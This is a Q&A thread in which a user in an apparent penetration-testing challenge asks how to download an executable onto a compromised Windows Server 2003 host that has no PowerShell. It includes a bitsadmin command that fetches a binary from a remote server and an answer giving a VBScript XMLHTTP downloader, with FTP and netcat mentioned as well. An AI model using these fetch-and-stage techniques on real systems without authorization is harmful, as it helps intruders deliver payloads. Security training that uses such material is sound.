How to download file using CMD.exe

Question

I am trying to download executable file on windows server 2003 as part of Penetration Testing course I am doing right now and I seem to fail... Powershell is not enabled and bitsadmin is just "freezing".

C:\dlhere>bitsadmin /transfer ez http://vps/executable.exe C:\dlhere\test.exe
bitsadmin /transfer ez http://vps/executable.exe C:\dlhere\test.exe

BITSADMIN version 2.0 [ 6.6.3790.1830 ]
BITS administration utility.
(C) Copyright 2000-2004 Microsoft Corp.

I am clueless right now...

I just acquired command-line access with "nt authority\systemd".

`procmon` and/or a sniffer may shed light on what is happening FS- and network-wise. They require admin rights, of course. — ivan_pozdeev, Oct 23 '16 at 20:24
Well it's not course - more of like challenge... we got no papers except how to connect to local network, — ovxrfl0w, Oct 23 '16 at 20:25
Several of the solutions here ought to work: [Is it possible to download using the Windows command line?](http://superuser.com/questions/59465/is-it-possible-to-download-using-the-windows-command-line) Also, if you have system-level access, you can re-enable PowerShell. — Ben N, Oct 23 '16 at 20:41
Well I just tried to re-enable it somehow but I noticed it's not even there... it's completely gone. — ovxrfl0w, Oct 23 '16 at 20:54
If it's Server _2003_, Powershell is indeed an optional component. — ivan_pozdeev, Oct 23 '16 at 22:45

score 0 · Answer 1 · edited Mar 20 '17 at 10:17

According to BITSAdmin Tool - MSDN (/Transfer switch section):

BITSAdmin updates the command window with progress information until the transfer is complete or until a critical error occurs. BITSAdmin completes the job if it successfully transfers all the files and cancels the job if a critical error occurs. BITSAdmin does not create the job if it is unable to add files to the job or if you specify an invalid value for type or job_priority. Note that BITSAdmin continues to run if a transient error occurs. To end BITSAdmin, press Ctrl+C.

Since BITS is designed to transfer in background mode, this can take unspecified time if network is busy - and especially if the BITS service is not running (I didn't check if the command starts it).

Apart from that, you can download with .NET functionality as per How to download files from command line in Windows, like Wget is doing? even with PowerShell disabled because csc.exe, the C# compiler, is bundled with .NET.

This can also be done with cscript using the XMLHTTP COM object as per Using Windows Script Host and COM to Hack Windows (the script file can be written with copy con):

dim XmlHttp, URL, FileName, OutputStream
URL = <URL>
FileName = <FILENAME>
set XmlHttp = WScript.CreateObject("MSXML2.XMLHTTP")
set OutputStream = WScript.CreateObject("ADODB.Stream")
XmlHttp.Open "GET", URL, false
XmlHttp.Send
OutputStream.Type = 1 'BINARY_STREAM_TYPE
OutputStream.Open
OutputStream.Write XmlHttp.responseBody
OutputStream.SaveToFile FileName, 2 'CREATE_OVERWRITE_SAVE_MODE
OutputStream.Close

other network utilities capable of file transfer - e.g. telnet and ftp - can do, too. Yet these tend to not be included by default since Vista.

There is working FTP but I cannot seem to do anything ... I have netcat shell. — ovxrfl0w, Oct 23 '16 at 22:42
Well, you need to know FTP console commands, and firewalls (all the way to your external server) should allow FTP traffic. Passive mode (which is _not_ the default for the console program) is likely to be required, too. — ivan_pozdeev, Oct 23 '16 at 22:50

How to download file using CMD.exe

1 Answers1